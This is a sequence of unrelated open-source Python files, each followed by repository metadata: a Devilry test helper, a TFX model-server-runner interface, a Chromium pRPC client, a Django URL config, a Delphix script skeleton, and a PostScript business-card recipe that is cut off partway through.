self.add_delivery('cs111.fall11.week3.g2', goodFile)
self.add_delivery('cs111.fall11.week3.g4', okFile)
# g4 fails
self.add_delivery('cs111.fall11.week4.g1', goodFile)
self.add_delivery('cs111.fall11.week4.g2', goodFile)
# feedbacks
# an empty verdict defaults to max score
goodVerdict = None
okVerdict = {'grade': 'C', 'points': 85, 'is_passing_grade': True}
badVerdict = {'grade': 'E', 'points': 60, 'is_passing_grade': True}
failVerdict = {'grade': 'F', 'points': 30, 'is_passing_grade': False}
self.add_feedback('cs101.fall11.a1.g1', verdict=goodVerdict)
self.add_feedback('cs101.fall11.a1.g2', verdict=goodVerdict)
self.add_feedback('cs101.fall11.a1.g3', verdict=badVerdict)
self.add_feedback('cs101.fall11.a1.g4', verdict=okVerdict)
self.add_feedback('cs101.fall11.a2.g1', verdict=goodVerdict)
self.add_feedback('cs101.fall11.a2.g2', verdict=goodVerdict)
self.add_feedback('cs101.fall11.a2.g3', verdict=badVerdict)
self.add_feedback('cs101.fall11.a2.g4', verdict=okVerdict)
# cs110
self.add_feedback('cs110.fall11.a1.g1', verdict=goodVerdict)
self.add_feedback('cs110.fall11.a1.g1', verdict=badVerdict)
self.add_feedback('cs110.fall11.a2.g2', verdict=goodVerdict)
self.add_feedback('cs110.fall11.a2.g2', verdict=okVerdict)
# cs111
self.add_feedback('cs111.fall11.week1.g1', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week1.g2', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week1.g3', verdict=badVerdict)
self.add_feedback('cs111.fall11.week1.g4', verdict=okVerdict)
# g3's feedback fails here
self.add_feedback('cs111.fall11.week2.g1', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week2.g2', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week2.g3', verdict=failVerdict)
self.add_feedback('cs111.fall11.week2.g4', verdict=okVerdict)
# g4's feedback fails here
self.add_feedback('cs111.fall11.week3.g1', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week3.g2', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week3.g4', verdict=failVerdict)
# g4 fails
self.add_feedback('cs111.fall11.week4.g1', verdict=goodVerdict)
self.add_feedback('cs111.fall11.week4.g2', verdict=goodVerdict)
| {
"content_hash": "1e0bf0b1071e5bafafae429f01b8210a",
"timestamp": "",
"source": "github",
"line_count": 797,
"max_line_length": 125,
"avg_line_length": 40.10288582183187,
"alnum_prop": 0.5913272010512484,
"repo_name": "vegarang/devilry-django",
"id": "f663407636ad79968c015e49069f32c1f3d420be",
"size": "31962",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devilry/apps/core/testhelper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "697906"
},
{
"name": "Python",
"bytes": "931589"
}
],
"symlink_target": ""
} |
"""Module for shared interface of every model server runners."""
import abc
from typing import Optional
class BaseModelServerRunner(abc.ABC):
"""Shared interface of all model server runners.
Model server runner is responsible for managing the model server job and
relevant resources in the serving platform. For example, model server runner
for kubernetes will launch a Pod of model server with required resources
allocated, and tear down all the kubernetes resources once infra validation
is done. Note that model server runner does *not* interact with model server
app.
Model server job have 5 states: Initial, Scheduled, Running, Aborted, and End.
Each state transition is depicted in the diagram below.
```
+-----------+
| Initial |
+-----+-----+
| Start()
+-----v-----+
+--+ Scheduled |
| +-----+-----+
| | WaitUntilRunning()
| +-----v-----+
+--+ Running |
| +-----+-----+
| |
+-----v-----+ |
| Aborted +--+ Stop()
+-----------+ |
|
+-----v-----+
| End |
+-----------+
```
At any step, the job can be aborted in the serving platform. Model server
runner will NOT recover a job from failure (even if it can) and regard the
abortion as a validation failure.
All the infra validation logic (waiting for model loaded, sending requests,
measuring metrics, etc.) will happen when model server job has reached Running
state. This is not a scope of model server runner work.
Depending on the serving platform, some of the states might be the same. For
example, in a GCP cloud AI prediction service we have a global model server
instance running, which makes Scheduled state and Running state
indistinguishable. In such case, `WaitUntilRunning()` action will be a no-op.
"""
@abc.abstractmethod
def __repr__(self) -> str:
pass
@abc.abstractmethod
def GetEndpoint(self) -> str:
"""Get an endpoint to the model server to connect to.
Endpoint will be available after the model server job has reached the
Running state.
Raises:
AssertionError: if runner hasn't reached the Running state.
"""
@abc.abstractmethod
def Start(self) -> None:
"""Start the model server in non-blocking manner.
`Start()` will transition the job state from Initial to Scheduled. Serving
platform will turn the job into Running state in the future.
In `Start()`, model server runner should prepare the resources model server
requires including config files, environment variables, volumes, proper
authentication, computing resource allocation, etc.. Cleanup for the
resources does not happen automatically, and you should call `Stop()` to do
that if you have ever called `Start()`.
It is not allowed to run `Start()` twice. If you need to restart the job,
you should create another model server runner instance.
"""
@abc.abstractmethod
def WaitUntilRunning(self, deadline: float) -> None:
"""Wait until model server job is running.
When this method is returned without error, the model server job is in the
Running state where you can perform all the infra validation logic. It does
not guarantee that model server job would remain in the Running state
forever, (e.g. preemption could happen in some serving platform) and any
kind of infra validation logic failure can be caused from model server job
not being in the Running state. Still, it is a validation failure and we
blame model for this.
Args:
deadline: A deadline time in UTC timestamp (in seconds).
Returns:
Whether the model is available or not.
"""
@abc.abstractmethod
def Stop(self) -> None:
"""Stop the model server in blocking manner.
Model server job would be gracefully stopped once infra validation logic is
done. Here is the place you need to cleanup every resources you've created
in the `Start()`. It is recommended not to raise error during the `Stop()`
as it will usually be called in the `finally` block.
`Stop()` is guaranteed to be called if `Start()` is ever called, unless the
process dies unexpectedly due to external factors (e.g. SIGKILL). `Stop()`
can be called even when `Start()` was not completed. `Stop()` should not
assume the completion of `Start()`.
`Stop()` is also called when graceful shutdown for the *executor* (not
model server) is requested. `Stop()` method should be finished within the
graceful shutdown period, and it is perfectly fine to add a retry logic
inside `Stop()` until the deadline is met.
"""
@abc.abstractmethod
def GetLogs(self) -> Optional[str]:
"""Get a model server log for debugging."""
| {
"content_hash": "9bc392ea79c4109bbb65dc919e72abae",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 80,
"avg_line_length": 38.234375,
"alnum_prop": 0.6653044544340008,
"repo_name": "tensorflow/tfx",
"id": "ea5ed1aefbc0e1a491bcdf5c7e78f999a4375dbf",
"size": "5490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tfx/components/infra_validator/model_server_runners/base_runner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7405"
},
{
"name": "Jupyter Notebook",
"bytes": "38579"
},
{
"name": "Python",
"bytes": "6009050"
},
{
"name": "Shell",
"bytes": "34056"
},
{
"name": "Starlark",
"bytes": "20324"
}
],
"symlink_target": ""
} |
import logging
import json
from typing import NamedTuple, Optional
from urllib.parse import urlunsplit
import six
from blinkpy.common.memoized import memoized
from blinkpy.common.net.luci_auth import LuciAuth
_log = logging.getLogger(__name__)
# These characters always appear at the beginning of the RPC response.
RESPONSE_PREFIX = b")]}'"
class Build(NamedTuple):
"""A combination of builder and build number.
If the build number is absent, this represents the latest build for a given
builder.
"""
builder_name: str
build_number: Optional[int] = None
build_id: Optional[str] = None
class RPCError(Exception):
"""Base type for all pRPC errors."""
def __init__(self, message, method, request_body=None, code=None):
message = '%s: %s' % (method, message)
if code:
message += ' (code: %d)' % code
super().__init__(message)
self.method = method
self.code = code
self.request_body = request_body
class BaseRPC:
"""pRPC client.
A pRPC server handles HTTP POST requests at:
/prpc/<service>/<method>
See Also:
go/prpc: Describes the provisional RPC protocol.
"""
def __init__(self, web, luci_auth, hostname, service):
self._web = web
self._luci_auth = luci_auth
self._hostname = hostname
self._service = service
@classmethod
def from_host(cls, host, *args, **kwargs):
return cls(host.web, LuciAuth(host), *args, **kwargs)
@memoized
def _make_url(self, method):
return urlunsplit((
'https',
self._hostname,
'/prpc/%s/%s' % (self._service, method),
'', # No query params
'', # No fragment
))
def _luci_rpc(self, method, data):
"""Fetches json data through Luci RPCs
Args:
method: Method for the RPC call.
data: the request body in json format
Returns:
On success: Returns the json representation of the response.
Otherwise: None
"""
luci_token = self._luci_auth.get_access_token()
headers = {
'Authorization': 'Bearer ' + luci_token,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
url = self._make_url(method)
body = six.ensure_binary(json.dumps(data, separators=(',', ':')))
response = self._web.request('POST', url, data=body, headers=headers)
if response.getcode() == 200:
response_body = response.read()
if response_body.startswith(RESPONSE_PREFIX):
response_body = response_body[len(RESPONSE_PREFIX):]
return json.loads(response_body)
_log.error("RPC request failed. Status=%s, url=%s", response.status,
url)
_log.debug("Full RPC response: %s" % str(response))
return None
def _luci_rpc_paginated(self,
method,
data,
field,
page_size=None,
count=1000):
"""Retrieve entities from a pRPC method with paginated results.
Some methods receive a request like:
{..., "pageSize": ..., "pageToken": ...}
and reply with a payload like:
{<repeated field>: [<entity1>, ...], "nextPageToken": ...}
This method automatically makes a sequence of requests to gather the
requested number of entities. Generally, the method parameters should
not change between requests except for the "pageToken" field.
Arguments:
method: The RPC method name (conventionally Pascal case).
data: JSON-encodable parameters to send to the RPC endpoint.
field: Name of the repeated field that should be extracted from each
response body.
page_size: Number of entities to retrieve per request. The server
may return fewer if the page size is larger than the maximum
supported (typically 1000). Defaults to `count` to try to get
all the data in one request.
count: Total number of entities to attempt to retrieve. The actual
number returned may be fewer, depending on how many entities
exist.
Returns:
A list of up to `count` entities. The shape of each entry depends
on the method.
See Also:
https://source.chromium.org/chromium/infra/infra/+/master:go/src/go.chromium.org/luci/buildbucket/proto/builds_service.proto
https://source.chromium.org/chromium/infra/infra/+/master:go/src/go.chromium.org/luci/resultdb/proto/v1/resultdb.proto
"""
entities = []
data['pageSize'] = page_size or count
while data.get('pageToken', True) and count - len(entities) > 0:
response = self._luci_rpc(method, data)
if not isinstance(response, dict):
break
entities.extend(response.get(field) or [])
data['pageToken'] = response.get('nextPageToken')
return entities[:count]
class BuildbucketClient(BaseRPC):
def __init__(self,
web,
luci_auth,
hostname='cr-buildbucket.appspot.com',
service='buildbucket.v2.Builds'):
super().__init__(web, luci_auth, hostname, service)
self._batch_requests = []
def _make_get_build_body(self, build=None, bucket='try',
build_fields=None):
request = {}
if build.build_id:
request['id'] = str(build.build_id)
if build.builder_name:
request['builder'] = {
'project': 'chromium',
'bucket': bucket,
'builder': build.builder_name
}
if build.build_number:
request['buildNumber'] = build.build_number
if build_fields:
# The `builds.*` prefix is not needed for retrieving an individual
# build.
request['fields'] = ','.join(build_fields)
return request
def _make_search_builds_body(self, predicate, build_fields=None):
request = {'predicate': predicate}
if build_fields:
request['fields'] = ','.join('builds.*.%s' % field
for field in build_fields)
return request
def get_build(self, build=None, bucket='try', build_fields=None):
return self._luci_rpc(
'GetBuild', self._make_get_build_body(build, bucket, build_fields))
def search_builds(self,
predicate,
build_fields=None,
page_size=None,
count=1000):
return self._luci_rpc_paginated('SearchBuilds',
self._make_search_builds_body(
predicate, build_fields),
'builds',
page_size=page_size,
count=count)
def add_get_build_req(self, build=None, bucket='try', build_fields=None):
self._batch_requests.append(
('getBuild', self._make_get_build_body(build, bucket,
build_fields), None, None))
def add_search_builds_req(self, predicate, build_fields=None, count=1000):
# No `page_size` argument, since it does not make sense to unpaginate
# data in a batch request. Just try to extract the repeated field and
# truncate it to `count` items, at most.
self._batch_requests.append(
('searchBuilds',
self._make_search_builds_body(predicate,
build_fields), 'builds', count))
def execute_batch(self):
"""Execute the current batch request and yield the results.
Once called, the client will clear its internal request buffer.
Raises:
RPCError: If the server returns an error object for any individual
response.
"""
if not self._batch_requests:
return
batch_requests, self._batch_requests = self._batch_requests, []
batch_request_body = {
'requests': [{
method: body
} for method, body, _, _ in batch_requests]
}
batch_response = self._luci_rpc('Batch', batch_request_body) or {}
responses = batch_response.get('responses') or []
for request, response_body in zip(batch_requests, responses):
method, request_body, field, count = request
error = response_body.get('error')
if error:
message = error.get('message', 'unknown error')
# Avoid the built-in `str.capitalize`, since it lowercases the
# remaining letters.
raise RPCError(message, method[0].upper() + method[1:],
request_body, error.get('code'))
unwrapped_response = response_body[method]
if field:
yield from unwrapped_response[field][:count]
else:
yield unwrapped_response
def clear_batch(self):
"""Clear the current batch request."""
self._batch_requests.clear()
class ResultDBClient(BaseRPC):
def __init__(self,
web,
luci_auth,
hostname='results.api.cr.dev',
service='luci.resultdb.v1.ResultDB'):
super().__init__(web, luci_auth, hostname, service)
def _get_invocations(self, build_ids):
return ['invocations/build-%s' % build_id for build_id in build_ids]
def query_artifacts(self, build_ids, predicate, page_size=None,
count=1000):
request = {
'invocations': self._get_invocations(build_ids),
'predicate': predicate,
}
return self._luci_rpc_paginated('QueryArtifacts',
request,
'artifacts',
page_size=page_size,
count=count)
| {
"content_hash": "f63c3272cb5df9f21e68628c8fce5de6",
"timestamp": "",
"source": "github",
"line_count": 277,
"max_line_length": 136,
"avg_line_length": 37.70397111913358,
"alnum_prop": 0.5465338950593642,
"repo_name": "nwjs/chromium.src",
"id": "421672bddb1cc1c2638ac95f40d8bdcf6df7c67f",
"size": "11974",
"binary": false,
"copies": "1",
"ref": "refs/heads/nw70",
"path": "third_party/blink/tools/blinkpy/common/net/rpc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import os
from django.conf.urls import url
from . import views
from . import plugins
from .utils import plugin_urlpatterns
DUMMY_OBSCURE_URL = 'this_should_be_in_env_var'
OBSCURE_URL = os.environ.get('OBSCURE_URL', DUMMY_OBSCURE_URL)
DIGITA_URL = os.environ.get('DIGITA_URL', DUMMY_OBSCURE_URL)
SENTILO_URL = os.environ.get('SENTILO_URL', DUMMY_OBSCURE_URL)
if DUMMY_OBSCURE_URL == OBSCURE_URL:
print("Warning: you should set OBSCURE_URL environment variable in this env\n\n")
OBSCURE_URL_PATTERN = r'^{}(.*)$'.format(os.environ.get('OBSCURE_URL', OBSCURE_URL))
DIGITA_URL_PATTERN = r'^{}$'.format(os.environ.get('DIGITA_URL', OBSCURE_URL))
# Load urlpatterns from plugins directory
urlpatterns = plugin_urlpatterns(plugins)
urlpatterns += [
url(r'^$', views.index, name='index'),
url(OBSCURE_URL_PATTERN, views.obscure_dump_request_endpoint, name='dump_request'),
url(DIGITA_URL_PATTERN, views.digita_dump_request_endpoint, name='digita_dump_request'),
url(r'^basicauth$', views.basicauth_dump_request_endpoint, name='basicauth_dump_request'),
url(r'^aqtest$', views.basicauth_dump_request_endpoint, name='aqtest'),
url(r'^fmiaq/v1$', views.fmiaqhandler, name='fmiaqhandler'),
url(r'^noisesensor/v1$', views.noisesensorhandler, name='noisesensorhandler'),
url(r'^mapmytracks/v1$', views.mapmytracks, name='mapmytracks'),
]
| {
"content_hash": "3789e90213dec605cc0a9f48933d10ed",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 94,
"avg_line_length": 44.064516129032256,
"alnum_prop": 0.7254758418740849,
"repo_name": "aapris/IoT-Web-Experiments",
"id": "71b54707c497f3455b259a5cc70fa4ec67b9501d",
"size": "1366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "iotendpoints/endpoints/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "101467"
}
],
"symlink_target": ""
} |
"""Description
Usage:
dx_skel.py ()
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_skel.py -h | --help | -v | --version
Description
Examples:
Options:
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.0.000'
import sys
from os.path import basename
from time import sleep, time
from docopt import docopt
from delphixpy.exceptions import HttpError
from delphixpy.exceptions import JobError
from delphixpy.exceptions import RequestError
from delphixpy.web import job
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary of engines
"""
try:
#Setup the connection to the Delphix Engine
dx_session_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
if arguments['--vdb']:
#Get the database reference we are copying from the database name
database_obj = find_obj_by_name(dx_session_obj.server_session,
database, arguments['--vdb'])
except DlpxException as e:
print_exception('\nERROR: Engine {} encountered an error while'
'{}:\n{}\n'.format(engine['hostname'],
arguments['--target'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dx_session_obj.job_mode(single_thread):
while (len(dx_session_obj.jobs) > 0 or len(thingstodo)> 0):
if len(thingstodo) > 0:
if OPERATION:
method_call
elif OPERATION:
method_call
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(dx_session_obj.server_session,
dx_session_obj.jobs[j])
print_debug(job_obj)
print_info('{}: Replication operations: {}'.format(
engine['hostname'], job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the
# running jobs list.
del dx_session_obj.jobs[j]
elif job_obj.job_state in 'RUNNING':
# If the job is in a running state, increment the
# running job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments['--poll']))
except (HttpError, RequestError, JobError, DlpxException) as e:
print_exception('ERROR: Could not complete replication '
'operation:{}'.format(e))
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
#Create an empty list to store threads we create.
threads = []
engine = None
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
#For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
engine = dx_session_obj[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print 'Error encountered in run_job():\n{}'.format(e)
sys.exit(1)
elif arguments['--all'] is False:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dx_session_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
(arguments['--engine'])))
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value '
'and try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]['default'] == \
'true':
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dx_session_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
#run the job against the engine
threads.append(main_workflow(engine))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
#elapsed_minutes = round((time() - time_start)/60, +1)
#return elapsed_minutes
return round((time() - time_start)/60, +1)
def main(arguments):
#We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global dx_session_obj
global debug
if arguments['--debug']:
debug = True
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
time_start = time()
single_thread = False
config_file_path = arguments['--config']
#Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
#This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info('script took {:d} minutes to get this far.'.format(
elapsed_minutes))
#Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_exception('Connection failed to the Delphix Engine'
'Please check the ERROR message:\n{}'.format(e))
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception('A job failed in the Delphix Engine')
print_info('{} took {:.2f} minutes to get this far\n{}'.format(
basename(__file__), elapsed_minutes, e))
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info('{} took {:.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info('{} took {.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main(arguments)
| {
"content_hash": "74740273c9e82c0d931a48cea43c4461",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 80,
"avg_line_length": 35.79333333333334,
"alnum_prop": 0.5569938536040231,
"repo_name": "mcbrune/delphixpy-automation",
"id": "521605296919413b77281370218baa95a278fdba",
"size": "11171",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "v1_8_0/dx_database.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "955569"
}
],
"symlink_target": ""
} |
"""
recipe_custom_ps.py
Template with sample code creating for custom Postscript PS files.
Sample code is a business card based on Levenger's personalized
3x5 card.
Ghostscript provides easiest way to view PS output, but not essential.
Utilities included.
Download Ghostscript:
http://www.ghostscript.com/download/gsdnld.html
"""
__author__ = "Jack Trainor"
__date__ = "2015-12-09"
import sys
import os.path
import subprocess
######################################################################
"""
String constants for business index card.
"""
NAME = "John Doe"
ADDRESS = "123 Main Street"
CITY = "Anytown, USA 01234"
EMAIL = "johndoe123@gmail.com"
PHONE = "1.555.123.4567"
FAX = "1.555.123.4568"
CELL = "1.555.123.4569"
PHONE_FIELD = "Phone"
FAX_FIELD = "Fax"
CELL_FIELD = "Cell"
######################################################################
"""
Auxiliary utilities.
*** REPLACE WITH VALID PATHS ON YOUR MACHINE. ***
"""
PDF_VIEWER = r"C:\Program Files\Foxit Software\Foxit Reader\FoxitReader.exe"
GSC = r"C:\Program Files\gs\gs9.16\bin\gswin32c.exe"
def pdfview(path):
""" Use PDF viewer to display pdf file. """
if os.path.exists(PDF_VIEWER):
subprocess.call([PDF_VIEWER, path])
else:
println("%s not installed." % PDF_VIEWER)
def gs_ps2pdf(input_ps, output_pdf):
""" Use Ghostscript to convert PS file to PDF file """
if os.path.exists(GSC):
println("gs_ps2pdf: %s -> %s" % (input_ps, output_pdf))
args =[GSC,
"-o", output_pdf,
"-sDEVICE=pdfwrite",
"-dPDFSETTINGS=/prepress",
"-dEmbedAllFonts=true",
"-dSubsetFonts=false",
# "-sFONTPATH=%s" % CUSTOM_FONTS # for custom fonts if any
"-dBATCH",
"-dQUIET",
"-c", ".setpdfwrite <</NeverEmbed [ ]>> setdistillerparams",
"-f"]
args.append(input_ps)
subprocess.call(args)
else:
println("%s not installed." % GSC)
def println(line):
sys.stdout.write(line + "\n")
######################################################################
"""
Postscript boilerplate for prolog and epilog of PS file.
Add your own Postscript procedures in prolog.
"""
PS_PROLOG = """%!PS-Adobe-2.0
%--------- Procedures ----------------
% Optimize without dict variables later, if at all
/rectPath % stk: width height left top => --
{ /t exch def
/l exch def
/h exch def
/w exch def
newpath
l t moveto
w 0 rlineto
0 h neg rlineto
w neg 0 rlineto
0 h rlineto
} def
/centershow % stk: y leftmargin rightmargin string => --
{ /s exch def
/rm exch def
/lm exch def
/y exch def
rm lm sub
s stringwidth pop sub
2 div
lm add y moveto
s show } def
/rightshow % stk: y rightmargin string => --
{ /s exch def
/rm exch def
/y exch def
s stringwidth pop
rm exch sub
y moveto
s show } def
/gridPath % stk: rows cols cellside left top => --
{ /top exch def
/left exch def
/cellside exch def
/cols exch def
/rows exch def
/width cellside cols mul def
/height cellside rows mul def
newpath
top /y exch def
left /x exch def
0 1 rows {
x y moveto
width 0 rlineto
y cellside sub /y exch def
} for
top /y exch def
left /x exch def
0 1 cols {
x y moveto
0 height neg rlineto
x cellside add /x exch def
} for
} def
%---------- PS Card --------------------
"""
PS_EPILOG = """
%---------- Epilog ---------------------
% done with this page
showpage
"""
######################################################################
"""
Constants for PS page and PS card
"""
DPI = 72.0
def inches_to_dots(inches):
return inches * DPI
PAGE_WIDTH = inches_to_dots(8.5)
PAGE_HEIGHT = inches_to_dots(11.0)
CARD_WIDTH = inches_to_dots(3.0)
CARD_HEIGHT = inches_to_dots(5.0)
CARD_LEFT = inches_to_dots(0.0)
CARD_TOP = CARD_HEIGHT
CARD_MARGIN_X = inches_to_dots(.25)
CARD_MARGIN_Y = inches_to_dots(.25)
GRID_CELLSIZE = inches_to_dots(.25)
GRID_ROWS = 15
GRID_COLS = 10
GRID_LEFT = CARD_MARGIN_X
GRID_TOP = CARD_MARGIN_Y + GRID_ROWS * GRID_CELLSIZE
NAME_FONT = "Palatino-bold"
NAME_FONTSIZE = 13.0
FIELDS_FONT = "Palatino-medium"
FIELDS_FONTSIZE = 8.0
TITLE_HEIGHT = inches_to_dots(.25)
FIELDS_HEIGHT = inches_to_dots(.145)
TITLE_Y = CARD_TOP - CARD_MARGIN_Y + inches_to_dots(.07)
NAME_Y = TITLE_Y - TITLE_HEIGHT
ADDRESS_Y = NAME_Y - FIELDS_HEIGHT
CITY_Y = ADDRESS_Y - FIELDS_HEIGHT
EMAIL_Y = CITY_Y - FIELDS_HEIGHT
FIELD_NAME_X = inches_to_dots(2.0)
FIELD_VAL_X = inches_to_dots(2.05)
LINEWIDTH = 0.5
TEMPLATE_ROWS = 1
TEMPLATE_COLS = 1
TEMPLATE_MARGIN_BOTTOM = inches_to_dots(0.5)
TEMPLATE_MARGIN_LEFT = inches_to_dots(0.75)
######################################################################
"""
Python wrappers for PS calls. Extend as necessary. Avoid using
raw Postscript in PsCard and PsPage calls.
"""
def setFont(font, fontsize):
return "/%s findfont %f scalefont setfont" % (font, fontsize)
def rectPath( width, height, left, top):
return "%.3f %.3f %.3f %.3f rectPath" % (width, height, left, top)
def gridPath(rows, cols, cellside, left, top):
return "%d %d %.3f %.3f %.3f gridPath" % (rows, cols, cellside, left, top)
def leftShow(x, y, s):
return "%.3f %.3f moveto (%s) show" % (x, y, s)
def rightShow(x, y, s):
return "%.3f %.3f (%s) rightshow" % (y, x, s)
def linewidth(lw):
return "%.3f setlinewidth" % lw
def setgray(percent):
return " %.3f setgray" % percent
def translate(x, y):
return "%.3f %.3f translate" % (x, y)
def gsave():
return "gsave"
def grestore():
return "grestore"
def draw_grid(lines, rows, cols, cellside, left, top):
lines.append(gridPath(rows, cols, cellside, left, top))
lines.append("stroke")
def draw_rect(lines, width, height, left, top):
lines.append(rectPath(width, height, left, top))
lines.append("stroke")
######################################################################
class PsRect(object):
""" Uitility class for Poscript rect """
def __init__(self, left, top, width, height):
self.top = top
self.left = left
self.width = width
self.height = height
self.calc_fields()
def calc_fields(self):
self.bottom = self.top-self.height
self.right = self.left+self.width
self.center_x = self.left+self.width/2.0
self.center_y = self.top-self.height/2.0
def copy(self):
return PsRect(self.left, self.top, self.width, self.height)
def inset(self, inset_x, inset_y):
self.left += inset_x
self.top -= inset_y
self.width -= 2*inset_y
self.height -= 2*inset_y
return self
def to_ps(self, lw):
lines = []
lines.append(linewidth(lw))
draw_rect(lines, self.width, self.height, self.left, self.top)
return "\n".join(lines)
######################################################################
class PsCard(object):
""" PsCard supports Postscript description of a single card. """
def __init__(self):
pass
def to_ps(self, lines):
rect = PsRect(CARD_LEFT, CARD_TOP, CARD_WIDTH, CARD_HEIGHT)
lines.append(rect.to_ps(LINEWIDTH))
lines.append(setFont(NAME_FONT, NAME_FONTSIZE))
lines.append(leftShow(CARD_MARGIN_X, NAME_Y, NAME))
lines.append(setFont(FIELDS_FONT, FIELDS_FONTSIZE))
lines.append(leftShow(CARD_MARGIN_X, ADDRESS_Y, ADDRESS))
lines.append(leftShow(CARD_MARGIN_X, CITY_Y, CITY))
lines.append(leftShow(CARD_MARGIN_X, EMAIL_Y, EMAIL))
lines.append(rightShow(FIELD_NAME_X, ADDRESS_Y, PHONE_FIELD))
lines.append(rightShow(FIELD_NAME_X, CITY_Y, FAX_FIELD))
lines.append(rightShow(FIELD_NAME_X, EMAIL_Y, CELL_FIELD))
lines.append(leftShow(FIELD_VAL_X, ADDRESS_Y, PHONE))
lines.append(leftShow(FIELD_VAL_X, CITY_Y, FAX))
lines.append(leftShow(FIELD_VAL_X, EMAIL_Y, CELL))
lines.append(setgray(0.8))
lines.append(linewidth(0.5))
draw_grid(lines, GRID_ROWS, GRID_COLS, GRID_CELLSIZE, GRID_LEFT, GRID_TOP)
######################################################################
class PsPage(object):
